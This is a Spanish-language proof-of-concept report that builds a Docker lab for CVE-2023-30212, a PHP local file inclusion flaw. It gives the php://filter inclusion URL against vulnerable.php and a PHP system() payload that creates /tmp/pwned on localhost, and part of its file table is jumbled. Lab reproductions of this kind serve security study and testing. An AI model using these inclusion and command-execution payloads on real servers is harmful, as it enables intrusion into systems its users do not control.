
PoC para CVE-2023-30212 usando Docker
PoC para CVE-2023-30212 usando Docker
Este informe contiene la configuración directa de un entorno web vulnerable basado en Docker para la vulnerabilidad CVE-2023-30212 (no disponible en Vulhub), y la demostración de dicha vulnerabilidad a través de un PoC.
php:8.1-apachevulnerable.php y malicious.php al directorio /var/www/html8088 expuesto para acceso externo
| Archivo | Descripción |
|---|---|
vulnerable.php | Archivo PHP con vulnerabilidad LFI |
---
docker-compose up -d
Nombre del contenedor: cve-2023-30212-cve-lfi-1
El servidor Apache se inicia y es accesible en http://localhost:8088
Llame a la siguiente URL para ver el contenido de malicious.php codificado en base64:
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
Al decodificar el resultado, se obtiene el siguiente código PHP:
<?php system("touch /tmp/pwned"); ?>
Llame a la siguiente URL para ejecutar realmente el comando:
http://localhost:8088/malicious.php
Después de ejecutar el comando, debería crearse el archivo /tmp/pwned.
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
Si el archivo pwned aparece en el resultado, la prueba es exitosa.
php://filtersystem()/tmp/pwnedmalicious.php| Archivo PHP malicioso que ejecuta comandos del sistema |
docker-compose.yml | Archivo de configuración para el contenedor |
Dockerfile | Archivo de configuración para la creación de la imagen Docker |